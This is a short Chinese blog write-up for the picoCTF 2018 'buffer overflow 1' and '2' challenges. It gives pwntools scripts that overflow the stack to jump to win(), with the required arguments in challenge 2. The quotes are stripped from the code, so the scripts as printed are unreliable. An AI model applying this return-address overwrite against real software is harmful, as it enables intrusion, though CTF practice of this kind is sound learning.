首页 > 其他 > 详细

picoctf_2018_buffer overflow 2

时间:2020-03-12 13:15:00      阅读:167      评论:0      收藏:0      [点我收藏+]

picoctf_2018_buffer overflow 1

vlun函数存在栈溢出,直接栈溢出到win函数即可

from pwn import *

r=remote(node3.buuoj.cn,25153)
elf=ELF(./PicoCTF_2018_buffer_overflow_1)
win_addr=elf.symbols[win]

payload=a*0x28+b*0x4+p32(win_addr)
r.sendline(payload)

r.interactive()                  

 

picoctf_2018_buffer overflow 2

技术分享图片

 在vuln函数中存在栈溢出,使其溢出跳转到win函数,并传入两个参数0xDEADBEEF和0xDEADC0DE

from pwn import *

r=remote(node3.buuoj.cn,26189)
#r=process(‘./PicoCTF_2018_buffer_overflow_2‘)
elf=ELF(./PicoCTF_2018_buffer_overflow_2)
win_addr=elf.symbols[win]

payload=a*0x6c+b*0x4
payload+=p32(win_addr)+p32(0xdeadbeef)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
r.sendline(payload)

r.interactive()

 

picoctf_2018_buffer overflow 2

原文:https://www.cnblogs.com/gaonuoqi/p/12468075.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!